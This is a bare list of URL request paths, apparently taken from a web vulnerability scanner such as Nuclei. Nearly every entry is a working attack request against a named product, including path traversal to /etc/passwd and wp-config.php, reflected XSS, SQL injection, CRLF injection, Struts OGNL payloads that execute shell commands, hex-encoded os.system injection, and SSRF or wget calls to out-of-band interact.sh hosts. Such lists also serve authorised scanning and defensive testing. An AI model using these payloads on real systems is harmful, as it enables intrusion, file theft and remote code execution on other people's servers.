"/anchor/errors.log",
"/ajax/render/widget_tabbedcontainer_tab_panel",
"/src/redirect.php?plugins%5B%5D=../../../../etc/passwd%00",
"/boafrm/formSysCmd",
"/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth",
"/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F%7B%7Bform_build_id%7D%7D",
"/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/.../.../.../.../.../.../.../.../.../windows/win.ini",
"/plugins/servlet/svnwebclient/error.jsp?errormessage='%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test",
"/account/index.php",
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00",
"/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&Send=Filter",
"/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00",
"/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00",
"/advanced_component_system/index.php?ACS_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00",
"/lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-admin/admin-ajax.php?action=2632ddf0e15df130d9746a22ce1d045e",
"/http_header.php",
"/RPC2",
"/website/blog/",
"/api/users",
"/metrics/v1/mbeans",
"/node/1?_format=hal_json",
"/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php",
"/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E",
"/api/jsonws/invoke",
"/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/ReportServer/Pages/ReportViewer.aspx",
"/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22",
"/tmui/locallb/workspace/tmshCmd.jsp",
"/vendor/phpfastcache/phpfastcache/examples/phpinfo.php",
"/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini",
"/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php",
"/wp-content/plugins/qards/html2canvasproxy.php?url=https://cadgqm02toabu64p21o0cktfmsoytcqco.interact.sh",
"/?host=http://0177.0.0.1/server-status",
"/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=nX7J5g&adminpassword=nX7J5g&adminemail=test@test.com&adminname=test",
"/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/document.php?modulepart=project&file=../../../../../../../etc/passwd",
"/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A",
"/spaces/viewdefaultdecorator.action?decoratorName",
"/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00",
"/hsqldb%0A",
"/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E",
"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php",
"/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/",
"/bugs/verify.php?confirm_hash=&id=1",
"/cgi-bin/libagent.cgi?type=J",
"/maint/index.php?packages",
"/index.php?r=i/../../../../../etc/passwd",
"/assets/file:%2F%2F/etc/passwd",
"/rest/v1/AccountService/Accounts",
"/wp-content/plugins/wsecure/wsecure-config.php",
"/context.json",
"/x",
"/api/v1/login/oauth2/auth",
"/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)",
"/setup.cgi?todo=debug&x=currentsetting.htm",
"/fileupload/toolsAny",
"/fileserver/test.txt",
"/html/device-id",
"/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd",
"/services/pluginscript/..;/..;/..;/getFavicon?host=cadgqm02toabu64p21o0ckq6x4yygeyee.interact.sh",
"/uploads/assets/backend/elfinder/elfinder-cke.html",
"/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&submit=Search",
"/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd",
"/zb_system/cmd.php?act=verify",
"/rest/issueNav/1/issueTable",
"/creaprezzi.php?prezzoperiodo4=%22%3E%3Cscript%3Ejavascript:alert('XSS')%3C/script%3E",
"/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow%3E%3C/TITLE%3E%3C/HEAD%3E%3Cbody%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C!--&%3EhelpFile=concepts.html",
"/www/delivery/afr.php?refresh=10000&%22)',10000000);alert(1337);setTimeout('alert(%22",
"/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd",
"/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd",
"/jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd",
"/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)",
"/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/auth/check",
"/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL",
"/version.web",
"/apply.cgi",
"/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini",
"/php/demo.php",
"/backend/elfinder/elfinder-cke.html",
"/boardDataWW.php",
"/assets/php/upload.php",
"/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php",
"/adm/file.cgi?next_file=%2Fetc%2Fpasswd",
"/sidekiq/queues/%22onmouseover=%22alert(nuclei)%22",
"/var",
"/%2F..%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/kylin/api/admin/config",
"/timesheet/login.php",
"/uploads/assets/backend/elfinder/elfinder.html",
"/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs",
"/?c=../../../../../../etc/passwd%00",
"/user/scripts/login_par.js",
"/ui_base/js/..%2F..%2F..%2F..%2Fsettings.js",
"/web_shell_cmd.gch",
"/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/graphql",
"/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00",
"/EemAdminService/EemAdmin",
"/html/repository",
"/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00",
"/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO",
"/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?download=/etc/passwd",
"/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0",
"/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00",
"/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1",
"/index.php?q=file:///etc/passwd",
"/index.php",
"/?s=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini",
"/?author=1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/AdminTools/querybuilder/logon?framework=",
"/images/..%2Finfo.html",
"/search.htm?searchstring2=&searchstring='%3E%22%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cgi-bin/login?LD_DEBUG=files",
"/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00",
"/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E",
"/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00",
"/console/login/LoginForm.jsp",
"/openx/www/delivery/lg.php?dest=http://example.com",
"/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php",
"/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd",
"/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/homeaction.php",
"/search/",
"/web/static/c:/windows/win.ini",
"/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini",
"/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E",
"/cgi-bin/status",
"/wp-json/wp/v2/users/",
"/Items/RemoteSearch/Image?ImageUrl=http://cadgqm02toabu64p21o0ckof1jeym8yww.interact.sh&ProviderName=TheMovieDB",
"/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd",
"/rest/tinymce/1/macro/preview",
"/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/misc.php?action=showpopups&type=friend",
"/?mp_idx=%22;alert('1');//",
"/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/lucee/2A6Shtr4a9fcLliFOzxU3XTS91i.cfm",
"/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd",
"/SDK/webLanguage",
"/wls-wsat/RegistrationRequesterPortType",
"/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00",
"/awstats/awredir.pl?url=example.com",
"/wp-content/plugins/simple-ajax-chat/sac-export.csv",
"/contrib/acog/print_form.php?formname=../../../etc/passwd%00",
"/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;",
"/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5Econfirm(document.domain)%5E%22a2pbrnzx5a9",
"/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.jsp",
"/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E=1",
"/messages",
"/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd",
"/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?q=%7B%7Buserid%7D%7D%2Fcancel&destination=%7B%7Buserid%7D%7D%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+%7C+rev",
"/STATE_ID/123/agentLogUploader",
"/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development",
"/index.action?redirect:http://www.example.com/",
"/dataservice/disasterrecovery/download/token/..%2F..%2F..%2F%2Fetc%2Fpasswd",
"/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E",
"/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00",
"/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00",
"/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com",
"/command.cgi?cat%20/etc/passwd",
"/?IO.popen('cat%20%2Fetc%2Fpasswd').read%0A%23",
"/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd",
"/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd",
"/TransferredOutModal.php?modfunc=detail",
"/settings.php",
"/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00",
"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22",
"/diag_routes.php?isAjax=1&filter=.*/!d;%7D;s/Destination/%5Cx3c%5Cx3fphp+var_dump(md5(%5Cx27CVE-2021-41282%5Cx27));unlink(__FILE__)%5Cx3b%5Cx3f%5Cx3e/;w+/usr/local/www/test.php%0A%23",
"/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/login.php?mid=0&usr=admin'%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/goforms/rlminfo",
"/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com",
"/poc.jsp?cmd=cat+%2Fetc%2Fpasswd",
"/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs",
"/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com",
"/module/api.php?mobile/webNasIPS",
"/cgi-bin/status/status.cgi",
"/modules/babel/redirect.php?newurl=http://example.com",
"/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2A6ShnN5h8e1ptwCxLuEDdzGSeV.jsp",
"/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains",
"/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00",
"/account",
"/_users/org.couchdb.user:poc",
"/device.rsp?opt=user&cmd=list",
"/login?redirect=%2F",
"/servlet/UploadServlet",
"/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open",
"/ws_utc/css/config/keystore/%7B%7Bid%7D%7D_2A6ShrwW6Wz1gtgjfScA4J8bRB5.jsp",
"/kindeditor/php/demo.php",
"/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00",
"/?page_id=0&&errors%5Bfu-disallowed-mime-type%5D%5B0%5D%5Bname%5D=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/webadmin/auth/verification.php",
"/?noptin_ns=email_click&to=https://example.com",
"/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E",
"/dompdf.php?input_file=dompdf.php",
"/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E",
"/magmi/web/info.php",
"/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/includes/dompdf/dompdf.php?input_file=dompdf.php",
"/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00",
"/updating.jsp?url=https://example.com/",
"/adm/krgourl.php?DOCUMENT_ROOT=http://cadgqm02toabu64p21o0ckom67oyck761.interact.sh",
"/admin/?n=language&c=language_general&a=doExportPack",
"/wp-admin/options-general.php/%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/?page=skatubazar_option",
"/webmail/calendar/minimizer/index.php?style=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini",
"/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData",
"/?s=%3Cimg%20src%3Dx%20onerror%3Dalert(123)%3B%3E",
"/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00",
"/login/",
"/NateMail.php",
"/wp-admin/admin.php?page=vfb-export",
"/template/custom/content-editor",
"/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/2A6Shsw4gl5lnlVlSLQ81dUYSVZ/)%3B%2F%2F",
"/users/sign_in",
"/themes",
"/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00",
"/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00",
"/images/..%2Fapply_abstract.cgi",
"/jira/secure/BrowseProject.jspa?id=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cgi-bin/test",
"/v2/api/product/manger/getInfo",
"/login",
"/confluence/pages/createpage-entervariables.action",
"/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd",
"/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://cadgqm02toabu64p21o0ckob3ceyjwfse.interact.sh",
"/assets/php/profile.php",
"/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22",
"/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF",
"/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
"/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert(document.domain)%22%3E.vm",
"/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs",
"/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00",
"/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-json/wp/v2/posts?per_page=1",
"/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B'location'%3A'Cairo'%2C'units'%3A'C'%2C'forecast_days'%3A'5%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ecustom_name'%3A'Cairo'%2C'animated'%3A'true'%7D",
"/page/1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==",
"/?id=%25%7B(%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D).(%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D).(%23bean%3D%23instancemanager.newInstance(%22org.apache.commons.collections.BeanMap%22)).(%23bean.setBean(%23stack)).(%23context%3D%23bean.get(%22context%22)).(%23bean.setBean(%23context)).(%23macc%3D%23bean.get(%22memberAccess%22)).(%23bean.setBean(%23macc)).(%23emptyset%3D%23instancemanager.newInstance(%22java.util.HashSet%22)).(%23bean.put(%22excludedClasses%22%2C%23emptyset)).(%23bean.put(%22excludedPackageNames%22%2C%23emptyset)).(%23arglist%3D%23instancemanager.newInstance(%22java.util.ArrayList%22)).(%23arglist.add(%22cat+%2Fetc%2Fpasswd%22)).(%23execute%3D%23instancemanager.newInstance(%22freemarker.template.utility.Execute%22)).(%23execute.exec(%23arglist))%7D",
"/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22",
"/login/?uid=%22%3E%3Cimg%20src=%22x%22%20onerror=%22alert('XSS');%22%3E",
"/esp/cms_changeDeviceContext.esp?device=aaaaa:a'%22;user%7Cs.%221337%22;",
"/webadmin/tools/unixlogin.php?login=admin&password=g'%2C'')%3Bimport%20os%3Bos.system('6563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))%23&timeout=5",
"/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..%5C..%5C..%5Cwindows%5Cwin.ini",
"/wp-admin/options-general.php/%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/script%3E?page=securimage-wp-options%2F",
"/wp-content/plugins/wp-mail-smtp-pro/",
"/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00",
"/index.php?v=d&p=%22;alert(document.domain);%22",
"/ui/api/v1/ui/auth/login",
"/%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini",
"/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00",
"/community/?foro=signin&redirect_to=https://example.com/",
"/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3Cscript%3Econfirm(2A6ShoPD9M0yJk75tPZunN3zLGZ)%3C%2Fscript%3E&win=2707",
"/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search",
"/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://cadgqm02toabu64p21o0ckxo1wyyeyioc.interact.sh",
"/status.htm",
"/test.txt",
"/wp-content/plugins/wp-payeezy-pay/donate.php",
"/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D",
"/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00",
"/lua/.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Ffind_prefs.lua.css",
"/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php",
"/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com",
"/wp-admin/admin-ajax.php",
"/modifica_cliente.php?tipo_tabella=%22%3E%3Cscript%3Ejavascript:alert('XSS')%3C/script%3E&idclienti=1",
"/magmi/web/magmi_run.php",
"/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E",
"/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00",
"/Login?!'%3E%3CsVg/OnLoAD=alert%601337%60//",
"/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00",
"/%7B%7Bpath%7D%7D/tree/a/search",
"/LetsEncrypt/Index?fileName=/etc/passwd",
"/webadmin/clientlogin/?srid=&action=showdeny&url=",
"/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/assets/file://%7B%7Bpath%7D%7D/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd",
"/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users",
"/2A6ShnTJOalevPUKp3S5ZuIZpCI.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://cadgqm02toabu64p21o0cktn1yyyty4do.interact.sh%22)%7D'",
"/api/graphql",
"/password.html",
"/?author=1",
"/auth/logout?continue=//example.com",
"/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E",
"/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd",
"/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/index_sso.php",
"/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wls-wsat/CoordinatorPortType",
"/test.txt%0D%0ASet-Cookie:CRLFInjection=Test%0D%0ALocation:%20example.com%0D%0AX-XSS-Protection:0",
"/confluence/pages/createpage-entervariables.action?SpaceKey=x",
"/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D",
"/index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input",
"/templates/editor-preload-container",
"/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd",
"/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/badging/badge_print_v0.php?tpl=../../../../../etc/passwd",
"/system/sharedir.php",
"/cgi-bin/stats",
"/%2F/",
"/webtools/control/xmlrpc",
"/ui/PWResetUserValidation",
"/cgi-bin/test-cgi",
"/DnnImageHandler.ashx?mode=file&url=http://cadgqm02toabu64p21o0ckqkjtyyn456g.interact.sh",
"/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=",
"/OA_HTML/lcmServiceController.jsp",
"/cgi-bin/mt/mt-xmlrpc.cgi",
"/Autodiscover/Autodiscover.xml",
"/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00",
"/login?redir=http://www.example.com",
"/error3?msg=30&data=';alert('nuclei');//",
"/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd",
